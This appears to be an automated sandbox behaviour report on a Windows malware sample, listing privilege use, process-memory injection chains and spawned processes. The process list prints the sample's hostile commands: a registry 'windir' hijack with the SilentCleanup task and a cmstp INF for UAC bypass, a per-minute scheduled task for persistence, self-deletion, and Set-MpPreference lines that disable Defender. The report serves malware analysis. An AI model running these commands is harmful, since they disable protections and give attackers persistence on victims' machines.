N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3152 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3152 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3152 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3152 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3152 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3152 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3152 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2836 wrote to memory of 3784 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3252 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3248 wrote to memory of 348 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3248 wrote to memory of 348 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3248 wrote to memory of 348 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 348 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 348 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 348 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3496 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe
PID 3496 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe
PID 3496 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe
PID 3496 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe
PID 3496 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe
PID 3496 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe
PID 3496 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe
PID 3496 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe
PID 3496 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe
PID 3496 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe
PID 3496 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe
PID 3496 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe
PID 3496 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 3496 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 3496 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 3496 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 2196 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2196 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2196 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe
PID 788 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\cmd.exe
PID 788 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\cmd.exe
PID 788 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\cmd.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3956 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe C:\Windows\SysWOW64\mshta.exe
PID 3536 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\schtasks.exe
PID 3536 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\schtasks.exe
PID 3536 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 3248 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\731583472955140\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 3248

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

"C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe"

C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe

"C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe"

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

"C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe"

C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe

"C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe"

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

"C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

"C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\mshta.exe

C:\Windows\System32\mshta.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe

"{path}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\asj2ixla.inf

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8907.tmp"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\he9LmnMhHX.exe

"{path}"

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Windows\temp\2hw54vq4.exe

C:\Windows\temp\2hw54vq4.exe

C:\Windows\temp\2hw54vq4.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

